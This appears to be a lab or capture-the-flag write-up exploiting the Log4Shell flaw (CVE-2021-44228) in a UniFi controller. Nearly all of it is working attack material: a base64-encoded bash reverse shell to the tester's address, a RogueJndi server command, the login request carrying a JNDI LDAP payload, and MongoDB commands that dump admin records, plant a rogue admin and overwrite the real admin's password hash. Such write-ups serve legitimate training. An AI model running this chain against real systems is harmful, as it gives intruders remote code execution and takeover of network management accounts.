It looks like it is a Unify app vulnerable to Log2j – CVE-2021-44228
If app is facing public network you can check if site is vulnerable by testing DNS requests to free generated domain on Internet. All info about this vulnerability can be find here:
I tested this vulnerability on TryHackMe room: https://tryhackme.com/room/solar, so I decided to find a ready exploit.
https://github.com/veracode-research/rogue-jndiI followed this PoC:
https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi
10.10.14.62 - tester
10.129.92.85 - victim
echo 'bash -c bash -i >&/dev/tcp/10.10.14.62/4444 0>&1' | base64
result:
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuNjIvNDQ0NCAwPiYxCg==
use previous result in this command:
java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuNjIvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.62"
Request in Burp (HTTPS and HTTP 1.1 required):
POST /api/login HTTP/1.1
Host: 10.129.92.85:8443
Content-Length: 107
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Sec-Ch-Ua-Mobile: ?0
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/json; charset=utf-8
Accept: */*
Origin: https://10.129.92.85:8443
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0.129.92.85:8443/manage/account/login?redirect=%2Fmanage
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"username":"asdf","password":"asdfas","remember":"${jndi:ldap://10.10.14.62:1389/o=tomcat}","strict":true}
There is no python to spawn better shell. I find another interesting way to spawn it:
script /dev/null -c bashFurther exploitation based on sprocketsecurity way:
Mongo is running on port 27117
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
I turned on john on this hash:
mkpasswd -m sha-512 password
$6$4XXp2x9p1SWvtlnm$mLLC/Vau5FiajN9ge0QcNq3SGdzg1/.YWJAov3xgfq/PsWwa76T1maF28GogWgmt4T1WND/Ae8tzAP8Rj3ugm/
mongo --port 27117 ace --eval 'db.admin.insert({ "email" : "null@localhost.local", "last_site_name" : "default", "name" : "unifi-admin", "time_created" : NumberLong(100019800), "x_shadow" : "<PASSWORD-HASH>" })'
mongo --port 27117 ace --eval 'db.admin.insert({ "email" : "null@localhost.local", "last_site_name" : "default", "name" : "unifi-admin", "time_created" : NumberLong(100019800), "x_shadow" : "$6$4XXp2x9p1SWvtlnm$mLLC/Vau5FiajN9ge0QcNq3SGdzg1/.YWJAov3xgfq/PsWwa76T1maF28GogWgmt4T1WND/Ae8tzAP8Rj3ugm/" })'
creds:
unifi-admin:password
So I couldn’t use this account to manage anything in unifi app, because of broken JSON file. I had to update password of original admin. ObjectId is used to identify object and db.admin.update() for updating variables.
mkpasswd -m sha-512 password
mongo --port 27117 ace --eval 'db.admin.update({"_id":
ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$4XXp2x9p1SWvtlnm$mLLC/Vau5FiajN9ge0QcNq3SGdzg1/.YWJAov3xgfq/PsWwa76T1maF28GogWgmt4T1WND/Ae8tzAP8Rj3ugm/"}})'
#Rooted